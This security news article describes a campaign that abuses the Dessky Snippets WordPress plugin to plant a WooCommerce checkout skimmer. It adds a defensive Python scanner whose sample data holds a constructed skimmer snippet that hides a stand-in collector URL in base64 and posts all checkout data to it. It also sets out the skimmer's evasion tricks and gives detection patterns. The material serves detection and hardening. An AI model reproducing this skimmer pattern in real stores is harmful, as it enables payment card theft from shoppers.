
WordPress plugin used to install e-skimmers in online stores

A WordPress plugin used to install e-skimmers on e-commerce websites

Pierluigi Paganini
May 28, 2024

Threat actors are abusing a legitimate WordPress plugin to insert malicious PHP code into e-commerce sites and steal credit card information.

Sucuri researchers have observed threat actors abusing a WordPress PHP code-snippet plugin to plant malicious code on WooCommerce online stores and harvest credit card information.

In the campaign detected by the experts, the attackers use a little-known WordPress plugin called Dessky Snippets, which at the time of writing had only a few hundred active installations.

Dessky Snippets is a lightweight and simple plugin that allows users to easily add custom PHP code from within their WordPress admin.

The campaign began on May 11, and from that same day researchers observed a sharp increase in downloads of the Dessky Snippets plugin. At the time of writing, the plugin has over 200 active installations.

Dessky Snippets WordPress plugin

The attackers used the Dessky Snippets plugin to insert a server-side PHP credit card e-skimmer.

“This malicious code has been written to the dnsp_settings option in the WordPress wp_options table and was designed to modify the WooCommerce checkout process by manipulating the checkout form and injecting custom code,” reads the analysis published by Sucuri.

The malware consists of two main components. The first is a bogus function named “twentytwenty_get_post_logos()” (a name chosen to blend in with legitimate theme code) that hooks into the WooCommerce billing form. It injects additional fields into the billing form so that the customer is asked for credit card details earlier than the normal checkout flow would request them. The second component is an obfuscated credit card skimmer that monitors POST data for specific parameters. When it sees those parameters, it sends all of the collected billing and credit card information to the third-party URL “hxxps://2of(.)cc/wp-content/”.

Researchers also noticed that the fake billing fields injected by the attackers had browser autofill disabled: the inputs are set to autocomplete="off".

Disabling autofill on a fake payment form avoids the risk of the browser warning the user about entering sensitive information into fields it does not recognize as a legitimate payment form. The fields stay blank until the victim types into them manually, so they look like ordinary required checkout inputs and raise less suspicion.
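Because this skimmer lives in a database row rather than in a plugin or theme file, a file-integrity scan of wp-content will not see it. The following scanner is an added example written for this article (it is not Sucuri's code or the plugin's) that turns the indicators described above into a check over a dump of wp_options rows: a hook into the WooCommerce billing or checkout form, injected card fields with autocomplete disabled, harvesting of $_POST data, obfuscation helpers, an outbound HTTP call, and the two campaign indicators named in the article (the twentytwenty_get_post_logos function name and the 2of.cc host). The input format is the JSON that `wp option list --format=json` prints (option_name/option_value objects); everything in the sample dump, including the snippet_vat option, the collector.example endpoint and the inert skimmer-like snippet, is constructed for the example and is not the live malware. Base64 string literals passed to base64_decode() are decoded so that a hidden collection endpoint surfaces in the report.

```python
"""Scan dumped wp_options rows for a server-side WooCommerce checkout skimmer.

Added example, not code from the article or from Sucuri. Indicator names,
sample rows and the collector.example host are constructed for illustration.
"""
import base64
import json
import re

# Plain regexes over the raw option_value. They also match when the snippet
# plugin stores code PHP-serialized, because serialization keeps the string
# contents literally.
INDICATORS = {
    "woocommerce_checkout_hook": re.compile(
        r"add_(?:action|filter)\(\s*['\"]woocommerce_\w*(?:billing|checkout)\w*['\"]", re.I),
    "card_field_injection": re.compile(r"card[_ -]?(?:number|no)|cvv|cvc", re.I),
    "autocomplete_off": re.compile(r"autocomplete['\"]?\s*=>?\s*['\"]off['\"]", re.I),
    "post_data_harvest": re.compile(r"\$_(?:POST|REQUEST)\s*\["),
    "obfuscation": re.compile(
        r"\b(?:eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "outbound_http": re.compile(
        r"\b(?:curl_init|curl_exec|wp_remote_(?:post|get|request)|fsockopen|file_get_contents)\s*\(", re.I),
    # Campaign-specific indicators taken from the article.
    "known_campaign_function": re.compile(r"twentytwenty_get_post_logos"),
    "known_campaign_host": re.compile(r"2of\.cc"),
}
KNOWN_IOCS = {"known_campaign_function", "known_campaign_host"}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
B64_LITERAL_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")


def decode_b64_literals(text):
    """Decode string literals passed to base64_decode() so hidden URLs surface."""
    out = []
    for lit in B64_LITERAL_RE.findall(text):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def classify(hits):
    """Verdict from the set of indicator names that matched."""
    if hits & KNOWN_IOCS:
        return "likely_skimmer"
    if "woocommerce_checkout_hook" not in hits:
        return "clean"
    card = {"card_field_injection", "autocomplete_off"} & hits
    exfil = {"post_data_harvest", "outbound_http", "obfuscation"} & hits
    if card and exfil:
        return "likely_skimmer"
    return "review"  # legitimate checkout customisations land here


def scan_option(name, value):
    hits = {k for k, rx in INDICATORS.items() if rx.search(value)}
    decoded = decode_b64_literals(value)
    urls = sorted(set(URL_RE.findall(value + "\n" + "\n".join(decoded))))
    return {"option": name, "verdict": classify(hits),
            "indicators": sorted(hits), "urls": urls if hits else []}


def scan_dump(json_text):
    """json_text: the JSON emitted by `wp option list --format=json`."""
    return [scan_option(r["option_name"], r["option_value"]) for r in json.loads(json_text)]


def flagged(json_text):
    return [r for r in scan_dump(json_text) if r["verdict"] != "clean"]


# Constructed sample dump: a core option, a benign checkout customisation and an
# inert skimmer-like snippet modelled on the description in the article.
_EXFIL_B64 = base64.b64encode(b"https://collector.example/wp-content/").decode()
SAMPLE_ROWS = [
    {"option_name": "siteurl", "option_value": "https://shop.example"},
    {"option_name": "snippet_vat", "option_value": (
        "<?php\nadd_filter('woocommerce_billing_fields', function ($f) {\n"
        "    $f['billing_vat'] = array('label' => 'VAT number', 'required' => false);\n"
        "    return $f;\n});")},
    {"option_name": "dnsp_settings", "option_value": (
        "<?php\nfunction twentytwenty_get_post_logos($f) {\n"
        "    $f['billing_card_number'] = array('label' => 'Card number', 'required' => true, 'autocomplete' => 'off');\n"
        "    $f['billing_card_cvv'] = array('label' => 'CVV', 'required' => true, 'autocomplete' => 'off');\n"
        "    return $f;\n}\n"
        "add_filter('woocommerce_billing_fields', 'twentytwenty_get_post_logos');\n"
        "add_action('init', function () {\n"
        "    if (!isset($_POST['billing_card_number'])) return;\n"
        f"    $u = base64_decode('{_EXFIL_B64}');\n"
        "    $c = curl_init($u); curl_setopt($c, CURLOPT_POSTFIELDS, http_build_query($_POST)); curl_exec($c);\n"
        "});")},
]
SAMPLE_DUMP = json.dumps(SAMPLE_ROWS)

if __name__ == "__main__":
    for r in flagged(SAMPLE_DUMP):
        print(r["verdict"], r["option"], r["indicators"], r["urls"])
```

On a real site, pipe `wp option list --format=json` into scan_dump() and treat every "review" row as something to read by hand: a checkout hook on its own is normal for a customised store, and the scanner only escalates to "likely_skimmer" when card fields or autocomplete="off" appear together with POST harvesting, obfuscation or an outbound request, or when one of the article's campaign indicators is present.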

“Generally, e-commerce sites are prime targets for hackers because of the valuable data they handle,” the report concludes. “Here’s a simple guide to protecting your online store:

  1. Update your software: Regularly update your CMS, plugins, themes and third-party components to patch vulnerabilities.
  2. Use strong passwords: Make sure all accounts, including admin, sFTP and database, have strong and unique passwords.
  3. Choose trusted scripts: Only integrate third-party JavaScript from reputable sources. Avoid unnecessary third-party scripts.
  4. Monitor threats: Check your site regularly for signs of malware, unauthorized changes, or any signs of a security breach.
  5. Implement a firewall: Use a web application firewall to block malicious bots, virtually patch known vulnerabilities, and filter malicious traffic.
  6. Configure the CSP: Establish a content security policy (CSP) to protect against clickjacking, cross-site scripting (XSS), and other threats.”
